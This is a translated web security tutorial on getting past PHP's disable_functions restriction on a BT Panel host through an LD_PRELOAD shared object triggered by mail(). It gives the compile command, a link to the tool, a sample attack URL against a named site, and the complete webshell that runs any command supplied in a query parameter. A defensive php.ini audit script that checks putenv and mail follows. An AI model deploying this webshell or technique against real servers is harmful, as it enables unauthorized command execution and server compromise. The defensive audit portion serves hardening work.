[Original] Web Security Chapter 8, Practical Part 02: Bypassing disable_functions for Privilege Escalation
1. Environment
BaoTa (BT Panel) Linux host
Host OS: CentOS; PHP version: 5.4
2. Disabled functions
These command-execution functions are disabled, so commands cannot be executed.
3. Bypass method
Hijack a function by hijacking a shared object, then execute commands.
cc -shared -fPIC bypass_disablefunc.c -o bypass_disablefunc_x64.so -ldl
Compile a different version depending on the target architecture.
To compile for x86, add -m32.
Download link
https://github.com/yangyangwithgnu/bypass_disablefunc_via_LD_PRELOAD
http://swww.apt999.com/bypass_disablefunc.php?cmd=pwd&outpath=/tmp/xx&sopath=/www/wwwroot/www.apt999.com/bypass_disablefunc_x64.so
bypass_disablefunc.php
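[php]
<?php
// Usage hint printed on the page.
echo "<p> <b>example</b>: http://site.com/bypass_disablefunc.php?cmd=pwd&outpath=/tmp/xx&sopath=/var/www/bypass_disablefunc_x64.so </p>";
// Command to run and the file its output is redirected to, both taken from the query string.
$cmd = $_GET["cmd"];
$out_path = $_GET["outpath"];
$evil_cmdline = $cmd . " > " . $out_path . " 2>&1";
echo "<p> <b>cmdline</b>: " . $evil_cmdline . "</p>";
// Pass the command line to the shared object through an environment variable.
putenv("EVIL_CMDLINE=" . $evil_cmdline);
// Path of the compiled shared object, set as LD_PRELOAD for any newly started process.
$so_path = $_GET["sopath"];
putenv("LD_PRELOAD=" . $so_path);
// mail() starts an external sendmail process, which inherits the environment set above.
mail("", "", "", "");
// Show the captured output, then delete the output file.
echo "<p> <b>output</b>: <br />" . nl2br(file_get_contents($out_path)) . "</p>";
unlink($out_path);
?>
[/php]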
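From the hardening side, the script above only works while both putenv() and mail() remain callable. The following php.ini audit is an added example, not code from the original article or from the linked project; the sample configurations, the function names `disabled_functions` and `audit`, and the result keys are assumptions made for illustration.

```python
import re

# The two PHP calls bypass_disablefunc.php depends on.
ENV_SETTERS = {"putenv"}      # sets LD_PRELOAD / EVIL_CMDLINE
PROCESS_SPAWNERS = {"mail"}   # hands the message to an external sendmail process

DIRECTIVE = re.compile(r"disable_functions\s*=\s*(.*)$")

def disabled_functions(ini_text):
    """Return the effective disable_functions set; the last assignment wins."""
    disabled = set()
    for raw in ini_text.splitlines():
        line = raw.split(";", 1)[0].strip()   # ';' starts a php.ini comment
        match = DIRECTIVE.match(line)
        if match:
            value = match.group(1).strip().strip('"')
            disabled = {name.strip() for name in value.split(",") if name.strip()}
    return disabled

def audit(ini_text):
    """Report whether putenv() plus a process-spawning call are both still callable."""
    disabled = disabled_functions(ini_text)
    setters = sorted(ENV_SETTERS - disabled)
    spawners = sorted(PROCESS_SPAWNERS - disabled)
    return {
        "env_setters_enabled": setters,
        "spawners_enabled": spawners,
        "preload_chain_possible": bool(setters and spawners),
    }

# Constructed samples, not the php.ini of the host in the article.
SAMPLE_WEAK = """
; only the classic command-execution functions are listed
disable_functions = exec,system,passthru,shell_exec,popen,proc_open
"""
SAMPLE_HARDENED = """
disable_functions = exec,system,passthru,shell_exec,popen,proc_open,putenv
"""

if __name__ == "__main__":
    for label, text in (("weak", SAMPLE_WEAK), ("hardened", SAMPLE_HARDENED)):
        print(label, audit(text))
```

In the hardened sample mail() is still enabled, but with putenv() disabled the script can no longer set LD_PRELOAD, so the audit reports the chain as broken.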
Original article by mOon. If you repost it, please credit the source: https://www.moonsec.com/612.html